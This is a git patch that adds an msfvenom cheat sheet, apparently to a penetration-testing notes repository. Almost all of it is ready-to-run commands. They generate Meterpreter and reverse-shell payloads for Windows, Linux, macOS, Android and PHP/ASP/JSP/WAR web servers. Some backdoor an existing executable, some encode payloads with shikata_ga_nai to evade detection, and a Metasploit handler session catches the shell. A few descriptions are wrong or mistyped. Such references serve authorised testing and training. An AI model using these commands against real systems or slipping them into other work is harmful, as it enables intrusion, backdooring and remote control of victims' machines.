From e543079ebafc97463f982577b74948ac13884e6c Mon Sep 17 00:00:00 2001 From: Omar Santos Date: Tue, 7 Jan 2020 13:27:05 -0500 Subject: [PATCH] Create msfvenom.md --- post_exploitation/msfvenom.md | 37 +++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 post_exploitation/msfvenom.md diff --git a/post_exploitation/msfvenom.md b/post_exploitation/msfvenom.md new file mode 100644 index 0000000..4812fdc --- /dev/null +++ b/post_exploitation/msfvenom.md @@ -0,0 +1,37 @@ +# MSFVenom + +MsfVenom is a Metasploit standalone payload generator as a replacement for msfpayload and msfencode. + +## Creting Binaries +`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Creates a simple TCP Payload for Windows +`msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Creates a simple HTTP Payload for Windows +`msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf Creates a simple TCP Shell for Linux +`msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho` Creates a simple TCP Shell for Mac +`msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk` Creats a simple TCP Payload for Android + +## Web Payloads +Command Info +`msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php` Creats a Simple TCP Shell for PHP +`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp` Creats a Simple TCP Shell for ASP +`msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp` Creats a Simple TCP Shell for Javascript +`msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war` Creats a Simple TCP Shell for WAR + +## Windows Payloads + +`msfvenom -l encoders` Lists all avalaible encoders +`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe` Binds an exe with a Payload (Backdoors an exe) +`msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe` Creates a simple TCP payload with shikata_ga_nai encoder +`msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe` Binds an exe with a Payload and encodes it + +## Getting a Metepreter Shell +``` +omar@ares:~$ sudo msfconsole +msf > use exploit/multi/handler +msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(multi/handler) > set lhost 192.168.1.123 +lhost => 192.168.1.123 +msf exploit(multi/handler) > set lport 4444 +lport => 4444 +msf exploit(multi/handler) > run +```